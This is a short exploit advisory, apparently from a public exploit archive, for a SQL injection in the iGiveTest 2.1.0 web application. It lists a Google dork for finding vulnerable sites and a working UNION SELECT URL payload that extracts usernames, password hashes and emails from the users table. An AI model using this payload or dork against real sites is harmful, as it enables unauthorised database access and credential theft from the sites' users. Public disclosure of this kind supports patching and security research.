ExploitFixes
iGiveTest 2.1.0 SQL Injection Vulnerability 2011-06-21 10:15:09

iGiveTest 2.1.0 SQL Injection Vulnerability

# Date: 2011-06-22
# Author: Brendan Coles <[email protected]>
# Advisory: http://itsecuritysolutions.org/2011-06-22-iGiveTest-2.1.0-SQL-Injection-Vulnerability/

# Software: iGiveTest
# Version: <= 2.1.0
# Homepage: http://iGiveTest.com/
# Google Dork: "Powered by iGiveTest"

# Vendor: Sight2k
# Homepage: http://sight2k.com/
# Notified: 2011-03-22 (currently unpatched)

# Exploit:

Guest level privilages, or higher, are required.

http://localhost/[PATH]/users.php?action=groups&order=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1